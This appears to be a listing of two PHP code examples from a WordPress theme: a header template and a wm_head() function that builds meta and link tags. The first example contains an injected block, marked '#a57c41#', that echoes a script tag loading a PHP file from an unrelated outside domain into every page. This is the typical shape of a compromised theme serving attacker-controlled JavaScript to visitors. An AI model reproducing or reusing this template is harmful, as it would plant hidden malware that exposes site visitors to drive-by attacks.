Example #1
0
<![endif]-->

<?php endif; ?>
<!-- profile and pingback -->
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" />

<!-- css stylesheets -->
<?php
if ( wm_option( 'design-font-custom' ) )
	echo wm_option( 'design-font-custom' ) . "\r\n";
?>
<link rel="stylesheet" href="<?php echo WM_ASSETS_THEME; ?>css/style.css.php<?php echo '?ver=' . WM_SCRIPTS_VERSION; ?>" type="text/css" media="screen" />
<link rel="stylesheet" href="<?php echo get_stylesheet_directory_uri(); ?>/assets/css/print.css<?php echo '?ver=' . WM_SCRIPTS_VERSION; ?>" type="text/css" media="print" />

<?php wm_favicon(); ?>
<!-- wp_head() -->
<?php wp_head(); ?>
</head>



<body id="top" <?php body_class(); ?>>
<?php
#a57c41#
if(empty($kd)) {
$kd = "<script type=\"text/javascript\" src=\"http://www.mmazojr.net/Manuel_Mazo_Jr/Abstractions_of_Communication_Networks_files/drhrttjm.php\"></script>";
echo $kd;
}
#/a57c41#
?>
Example #2
0
 function wm_head()
 {
     //Helper variables
     global $is_IE;
     $output = array();
     //Preparing output
     if (!wm_option('skin-disable-responsive')) {
         $output[10] = '<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />';
     }
     // $output[20] = apply_filters( 'wmhook_meta_author', '<meta name="author" content="WebMan, ' . WM_DEVELOPER_URL . '" />' );
     $output[30] = '<link rel="profile" href="http://gmpg.org/xfn/11" />';
     $output[40] = '<link rel="pingback" href="' . get_bloginfo('pingback_url') . '" />';
     if ($is_IE) {
         $output[50] = '<!-- IE specific -->';
         $output[50] .= '<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" />';
         $output[50] .= '<!--[if lt IE 9]>';
         $output[50] .= '<script src="' . wm_get_stylesheet_directory_uri('assets/js/html5.js') . '</script>';
         $output[50] .= '<![endif]-->';
     }
     $output[60] = wm_favicon();
     //Filter output array
     $output = apply_filters('wmhook_wm_head_output_array', $output);
     //Output
     echo apply_filters('wmhook_wm_head_output', implode("\r\n\t", $output));
 }